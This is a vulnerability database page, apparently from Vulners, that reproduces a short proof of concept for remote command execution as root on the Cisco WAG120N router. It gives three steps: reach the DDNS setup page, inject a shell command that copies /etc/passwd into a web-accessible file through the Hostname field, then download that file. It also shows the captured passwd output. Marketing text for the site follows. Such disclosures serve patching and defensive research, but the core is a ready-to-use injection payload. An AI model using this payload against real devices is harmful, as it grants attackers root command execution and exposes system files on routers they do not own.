Vulners
Lucene search
Cisco WAG120N Command Execution Vulnerability
Hello, here you have a quick POC in three simple steps
# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fernández Fernández ([email protected])
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3º Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
--
Manuel Fernández
# 0day.today [2018-02-27] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2012 00:00Current
7.2High risk
Vulners AI Score7.2